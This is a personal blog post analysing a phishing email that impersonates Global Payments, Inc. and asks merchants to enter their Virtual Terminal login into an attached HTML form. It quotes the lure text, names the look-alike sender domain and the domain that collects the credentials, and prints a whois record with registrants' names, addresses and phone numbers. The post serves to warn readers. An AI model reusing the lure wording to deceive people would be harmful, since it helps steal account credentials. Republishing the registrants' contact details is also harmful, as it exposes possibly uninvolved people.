Analysis of a Chinese Phishing Scam – Global Payments, Inc.

This post will be of particular interest to customers of Global Payments, Inc. I received an email which seemingly came from them, asking for account login details. Since I don’t have an account with them (and before this morning didn’t know who they were), I did some detective work. It turns out to be a phishing scam.

phish·ing/ˈfiSHiNG/
Noun:
The fraudulent practice of sending e-mails purporting to be from legitimate companies in order to induce individuals to reveal personal or confidential information, such as such as credit card numbers or passwords by directing a user to a fake email message or website.

Do not trust any emails coming from the domain “global-paymts.com”, e.g. “virtualT@global-paymts.com”. This is not the company “Global Payments, Inc.” (which itself is a valid company), but a phishing scam intended to get you to enter your real payment processor login data, which the scammers will then use to access your real account and take all your real monies.

A Google search did not turn anything up, so I did a little investigating myself. The HTML form in the email accepts your login info and sends it to a script at the fjnusoft.com domain. A “whois” search reveals that this is a Chinese domain:

Domain Name.......... fjnusoft.com
  Creation Date........ 2007-04-08 11:12:47
  Registration Date.... 2007-04-08 11:12:47
  Expiry Date.......... 2016-04-08 11:12:47
  Organisation Name.... fu jianshida ruanjian
  Organisation Address. fujianshifandaxue ruanjianrencaipeiyangjidi
  Organisation Address.
  Organisation Address. fuzhou
  Organisation Address. 350000
  Organisation Address. FJ
  Organisation Address. CN

Admin Name........... lu qixue
  Admin Address........ fujianshifandaxue ruanjianrencaipeiyangjidi
  Admin Address........
  Admin Address........ fuzhou
  Admin Address........ 350000
  Admin Address........ FJ
  Admin Address........ CN
  Admin Email.......... lqx@fjnusoft.com
  Admin Phone.......... +86.59187248372
  Admin Fax............ +86.59183560708

Tech Name............ jinfeng wang
  Tech Address......... BeiGuo East Residential District 26-102
  Tech Address.........
  Tech Address......... Nantong
  Tech Address......... 226001
  Tech Address......... JS
  Tech Address......... CN
  Tech Email........... sales@dns99.net
  Tech Phone........... +86.51385292710
  Tech Fax............. +86.51385292710

Bill Name............ jinfeng wang
  Bill Address......... BeiGuo East Residential District 26-102
  Bill Address.........
  Bill Address......... Nantong
  Bill Address......... 226001
  Bill Address......... JS
  Bill Address......... CN
  Bill Email........... lqx@fjnusoft.com
  Bill Phone........... +86.51385292710
  Bill Fax............. +86.51385292710
  Name Server.......... ns1.dns.com.cn
  Name Server.......... ns2.dns.com.cn

Below is the email I received. Note that I use mutt, a text-based email reader. If you are reading your email on a web browser and are hit with this scam email, the text of the message will be the same as below but you will probably see the HTML form and some image(s).

From: "GlobalPayments, Inc" 
To: contact@ngmarley.com
Subject: Account Update

[-- Attachment #1 --]
[-- Type: text/plain, Encoding: 7bit, Size: 0.2K --]

Dear GlobalPayments Customer,

Because we registrated to many frauds we decided to lock your Virtual Terminal account.
To unlock it please download the file attached to this e-mail and update your login info.

2012 Copyright Global Payments ,Inc.


[-- Attachment #2: Login_myvirtualmerchant.html --]
[-- Type: application/html, Encoding: 7bit, Size: 2.2K --]

[-- application/html is unsupported (use 'v' to view this part) --]

[-- Attachment #3 --]
[-- Type: text/plain, Encoding: 7bit, Size: 0K --]

update: Apparently the company Global Payments, Inc. are aware of this scam, as they have an alert on their homepage and a link to a more detailed alert/disclaimer here: http://www.globalpaymentsinc.com/Alert.html